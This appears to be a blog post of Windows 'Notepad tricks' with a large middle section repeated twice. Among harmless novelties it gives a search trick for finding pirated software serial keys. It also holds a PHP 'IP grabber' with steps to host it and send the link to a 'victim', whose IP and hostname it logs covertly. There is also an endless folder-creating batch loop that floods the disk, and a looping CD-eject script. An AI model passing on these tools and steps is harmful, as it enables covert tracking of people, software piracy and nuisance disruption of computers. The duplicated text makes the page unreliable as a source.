How To Find Serial Key Of Any Software?
1. Go to Google
2. Then type Software Name 94FBR
How To Access Blocked Sites ?
Control panel > n/w & sharing center > set new connection and network > connect to a workplace > VPN >
Internet Address = uk.websitevpn.com
Destination Name = VPN Connection > next >
UserName = websitevpn.com
PWD = freevpn > ok.
- Go to Start and then Click on Run
- Type cmd & hit enter (To open Command Prompt ).
- Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
- Type D: or E: and hit enter
- Type md con\ and hit enter (md - make directory)
- You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
- Open that directory, you will see the folder created of name con.
- Try to delete that folder or rename that folder windows will show the error message.
How to delete that folder ?
It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
- Open Command Prompt
- Type D: ( if u created this type of folder in D: drive) & hit enter
- Type rd con\ (rd - remove directory)
- Open that directory and the folder will not appear because it is removed.
Hacking can be done in lots of ways. Few of them are given below:
- Worms: These are the programs which propagate through networks.
- Trojans: These are hidden in websites, attached files and emails.
- Viruses: These attach themselves to various kinds of files. They can damage certain functions of your computer
Download Toutube Video without any software
ssyoutube.com/....... {ss(copy link)}
Example :
youtube link == https://www.youtube.com/watch?v=gmBRh3F9Qwo
you type only == ssyoutube.com/watch?v=gmBRh3F9Qwo
Making Personal Diary Using Notepad ...
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital Letters and press enter
2. Save the program with any name and close it.
3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.
Make Your keyboard led blinking like disco lights...
In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.
know the gender of your computer...
This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. So let get started.
How To Do ?
1. Copy the below codes into Notepad and save it as gender.vbs (.vbs is must)
CreateObject("SAPI.SpVoice").Speak"i love you"
2. Now, open the save file
3. If you hear male voice then your computer is male and if you hear female voice then its female.
How To Hack Someone Ip Address ?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
How To Your Computer in auto Open CD/DVD drive ?
1.Copy the below codes into Notepad and save it as funcd.vbs (.vbs is must)
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5
loop
2. Now, open the save file
HTML with notepad ...
1.Copy the below codes into Notepad and save it as hello.html (.html is must)
<html><marquee><scrollammount=8><font color=red><font size=10>
Wel Come!
</marquee></font></html>
2. Now, open the save file.
How To Make more than thousands of folder Using notepad?..
Copy the below codes into Notepad and save it as fun.bat (.bat is must)
1. Open notepad.
2. Copy the following code:
@echo off
:top
md %random%
goto top
Now, open the save file
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
1. Open Notepad and Type .LOG (in capital Letters and press enter
2. Save the program with any name and close it.
3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.
Make Your keyboard led blinking like disco lights...
In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.
know the gender of your computer...
This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. So let get started.
How To Do ?
1. Copy the below codes into Notepad and save it as gender.vbs (.vbs is must)
CreateObject("SAPI.SpVoice").Speak"i love you"
2. Now, open the save file
3. If you hear male voice then your computer is male and if you hear female voice then its female.
How To Hack Someone Ip Address ?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
How To Your Computer in auto Open CD/DVD drive ?
1.Copy the below codes into Notepad and save it as funcd.vbs (.vbs is must)
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5
loop
2. Now, open the save file
HTML with notepad ...
1.Copy the below codes into Notepad and save it as hello.html (.html is must)
<html><marquee><scrollammount=8><font color=red><font size=10>
Wel Come!
</marquee></font></html>
2. Now, open the save file.
How To Make more than thousands of folder Using notepad?..
Copy the below codes into Notepad and save it as fun.bat (.bat is must)
1. Open notepad.
2. Copy the following code:
@echo off
:top
md %random%
goto top
Now, open the save file
Amazing Search with Google ...
searching to "barrel roll" and hitting “I’m feeling lucky”
searching to "zerg rush" and hitting “I’m feeling lucky”
http://elgoog.im/guitar/
http://elgoog.im/pacman/
http://elgoog.im/snake/
http://iploc.org/
http://elgoog.im/underwater/
http://elgoog.im/gravity/
http://elgoog.im/terminal/
http://elgoog.im/
searching to "epig google"
searching to "google loco"
searching to "find chuck norris"
searching to "tilt"
searching to "2204355"
searching to "google sphere"
searching to "the answer to life the universe and everything"
searching to "google pacman" Google gravity
searching to "elgoog"
searching to "doodles"
0 comments:
Post a Comment